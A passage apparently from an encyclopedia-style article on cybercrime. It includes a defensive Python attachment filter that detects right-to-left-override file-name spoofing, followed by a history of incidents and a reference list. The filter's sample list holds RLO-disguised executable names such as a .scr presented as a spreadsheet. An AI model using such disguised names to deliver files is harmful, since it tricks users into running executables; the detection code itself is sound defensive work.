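    "\u202e": "RLO", "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI",
    "\u2069": "PDI",
}

# Extensions Windows executes on double-click (assumed list, extend as needed).
EXECUTABLE_EXTENSIONS = {
    "exe", "scr", "bat", "cmd", "com", "pif", "msi", "hta", "js", "vbs", "ps1",
}

# Constructed attachment names: the three from the Trend Micro description
# plus two ordinary ones. Each RLO is written as the escape \u202e.
SAMPLE_ATTACHMENTS = [
    "phone & mail)\u202eslx.scr",
    "BACKS\u202eFWS.BAT",
    "I-LOVE-YOU-XOX\u202eTXT.EXE",
    "quarterly-report.xlsx",
    "invoice.pdf.exe",
]


def bidi_controls_in(name: str) -> list:
    """Positions and names of bidi control characters found in a file name."""
    return [(i, BIDI_CONTROLS[c]) for i, c in enumerate(name) if c in BIDI_CONTROLS]


def displayed_name(name: str) -> str:
    """Approximation of what a left-to-right file dialog shows: the text after
    an RLO is rendered reversed until a PDF (U+202C) or the end of the name,
    and the control characters themselves are invisible. (The full Unicode
    bidi algorithm also reorders digits and mirrors brackets; for the ASCII
    letters used in these lures plain reversal is what the user sees.)"""
    out = []
    i = 0
    while i < len(name):
        c = name[i]
        if c == "\u202e":
            end = name.find("\u202c", i + 1)
            if end == -1:
                end = len(name)
            out.append(name[i + 1:end][::-1])
            i = end + 1                      # skip the PDF, if any
        elif c in BIDI_CONTROLS:
            i += 1                           # other controls: invisible
        else:
            out.append(c)
            i += 1
    return "".join(out)


def _extension(name: str) -> str:
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def real_extension(name: str) -> str:
    """Extension the operating system acts on: controls stripped, no reversal."""
    return _extension("".join(c for c in name if c not in BIDI_CONTROLS))


def displayed_extension(name: str) -> str:
    """Extension the user believes the file has."""
    return _extension(displayed_name(name))


def assess_attachment(name: str) -> tuple:
    """Gateway decision for one attachment name:
    ('block' | 'quarantine' | 'allow', reason)."""
    controls = bidi_controls_in(name)
    shown, real = displayed_extension(name), real_extension(name)
    if controls and shown != real:
        return ("block", f"bidi override shows .{shown} but the file is .{real}: "
                         f"displayed as {displayed_name(name)!r}")
    if real in EXECUTABLE_EXTENSIONS:
        return ("block", f"executable attachment (.{real})")
    if controls:
        return ("quarantine", "bidi control characters in file name")
    return ("allow", "")


if __name__ == "__main__":
    for attachment in SAMPLE_ATTACHMENTS:
        verdict, reason = assess_attachment(attachment)
        print(f"{displayed_name(attachment)!r:32} -> {verdict}: {reason}")
```

Note that the decision compares the extension the operating system will use (`real_extension`, with the control characters removed) against the one the user sees (`displayed_extension`); a filter that only looks at the raw string would see `slx.scr` and might still catch it by extension, but it would miss a lure whose real extension is on an allow list and only the displayed one is deceptive.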
History of major incidents
- September 2003. Taiwan was hit by Trojans sent from Chinese provinces that damaged the networks of ten private companies.
- In April 2007, Estonian Foreign Minister Urmas Paet accused the Russian authorities of hacker attacks that paralyzed the stock exchange, hospitals, and the websites of government agencies and the media.
- From the same network addresses used against Estonia, attacks were carried out on the computer systems of Georgia's oil pipelines in August 2008.
- In January 2010, Google accused China of spying through the email accounts of journalists and dissidents.
- According to British media (February 2012), Russian hackers sell the account numbers and passwords of payment cards belonging to a large number of UK residents. The British data is sold on Russian websites for $30 a record.
Data on UK residents became available after Russian attackers built a database of it on the Internet. For $300 the hackers also offer access to a valid UK bank account with a credit limit of up to $13 thousand. The attackers steal confidential information by sending malware to users' computers; fraudsters also attach skimming devices that read card data in shops and restaurants. After the theft, the data is written to blank cards, which can be used to pay in countries that have not yet adopted chip (EMV) authentication of the payment card, as well as in e-commerce stores.
Notes
- ↑ The draft United Nations convention against cybercrime
- ↑ Reconvened concluding session of the Ad Hoc Committee
- ↑ Transnational Crime in Southeast Asia: A Growing Threat to Global Peace and Security
- ↑ USD 300 million seized and 3,500 suspects arrested in international financial crime operation
- ↑ Middle East Cybersecurity Market with COVID-19 Analysis, by Component (Solutions and Services), Security Type (Network Security, Endpoint Security, Cloud Security, Database Security), Deployment Mode, Organization Size, Vertical - Forecast to 2027.
- ↑ Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies
- ↑ The Killnet wave of cyber attacks crashed against Estonian defense systems
- ↑ Albania went offline after a cyber attack.
- ↑ Russian-speaking hackers from Killnet paralyzed the work of several Lithuanian government agencies.
- ↑ The Killnet gang has announced a "large-scale and unprecedented" attack on Italy.
- ↑ The world's largest hacker forum on the trade in stolen databases is closed.
- ↑ 1,000 held in 20 countries as part of Interpol crackdown on cyber-enabled financial crime
- ↑ Kaspersky discovered 1.3 thousand malware with the name of video conferencing services
- ↑ Beware scams exploiting coronavirus fears
- ↑ Trend Micro Research Discovers Botnet Battle for Home Routers
- ↑ Mobile adware: The Silent Plague with No Origin
- ↑ Visa: Gas Station Networks Targeted to Steal Card Data
- ↑ Multiple hotels hit by targeted malware attacks
- ↑ Fortinet 2019 Operational Technology Security Trends Report
- ↑ Hundreds of motel guests were secretly filmed and live-streamed online
- ↑ Hackers Made Half a Million Dollars Pretending They Watched You Watch Porn
- ↑ About $1.2 billion in cryptocurrency stolen since 2017: cybercrime group
- ↑ U.S. Launches Criminal Probe into Bitcoin Price Manipulation
- ↑ Losses of cryptocurrency owners as a result of their thefts in 2018 amount to $1.36 billion
- ↑ Juniper Research: The Future of Cybercrime & Security: Enterprise Threats & Mitigation, by James Moar (25 April 2017); damages estimated for the five-year period from 2017 to 2022.
- ↑ The eleventh issue of the report provides the results of analysis and trends in the field of cybersecurity over the past 12-18 months, based on research information and data obtained from partner companies Anomali, Lumeta, Qualys, Radware, SAINT and TrapX. The report also contains the results of the annual Security Capabilities Benchmark Study (SCBS), based on a questionnaire of 3,600 chief information security officers and managers from 26 countries who answered questions about the state of cybersecurity in their organizations.
- ↑ Paradigm Shifts: Trend Micro Security Predictions for 2018.
- ↑ US intelligence agencies: Islamic State settled in cyberspace
- ↑ PwC: Russian companies have caught up with American ones in terms of cybersecurity, http://www.securitylab.ru/news/489586.php
- ↑ Phiendish phisher gets phive years in phederal for $2m phlights phraud
- ↑ TheShadowBrokers Monthly Dump Service – June 2017 (Comey Wanna Cry Edition; payment in Zcash)
- ↑ Hacker Sentenced To 30 Months In Prison For Role In Largest Known Computer Hacking And Securities Fraud Scheme
- ↑ Internet Security Threat Report
- ↑ 'Nigerian princes' snatch billions from Western biz via fake email – Interpol
- ↑ Goodbye smartphone - Danish MPs leave gadgets at home during Russia trip
- ↑ Cybersecurity 2016-2017: from results to forecasts.
- ↑ Internet propaganda is one of the main cyber threats of 2017
- ↑ The 2016 Cyber Resilient Organization study, conducted by the Ponemon Institute with the support of Resilient, is an overview of best practices in countering cyber threats, namely the ability of enterprises to maintain uninterrupted operation and preserve their integrity in the face of cyber attacks. The global study draws on a survey of more than 2.4 thousand IT and security specialists from around the world, including the USA, Great Britain, France, the UAE, Germany, Brazil and Australia.
- ↑ Club.CNews: The main 8 trends in the field of cybercrime (according to EU police as of 2016), http://club.cnews.ru/blogs/entry/import_europol_nazval_vosem_osnovnyh_tendentsij_kiberprestuplenij_25bb
- ↑ Breach Level Index (BLI) is a centralized global database that accumulates information on all data leaks recorded in the world and rates the threat level of each leak by several criteria, including the type of data and number of compromised records, the source of the leak, and whether the compromised information was encrypted. Because every leak is scored, the BLI is a comparative table of leaks that lets small and minor incidents be distinguished from really large and significant ones. The information in the BLI database is based on publicly available reports of leaks. More information is available at www.breachlevelindex.com.
- ↑ The HP Cyber Risk Report has been published since 2009. In preparing it, HP Security Research specialists use a number of internal and external sources, including the HP Zero Day Initiative, HP Fortify on Demand assessments, HP Fortify Software Security Research, Reversing Labs and the National Vulnerability Database. A detailed description of the methodology is provided in the report.
- ↑ Source
- ↑ The Internet Security Threat Report is based on real, empirical data collected by the Symantec Global Intelligence Network, original research and active monitoring of hacker communications. The report gives a global and objective view of the state of Internet security. Volume 16 of the report covers the period from January to December 2010.
- ↑ CRN
- ↑ Security methods: solutions that can withstand cyber attacks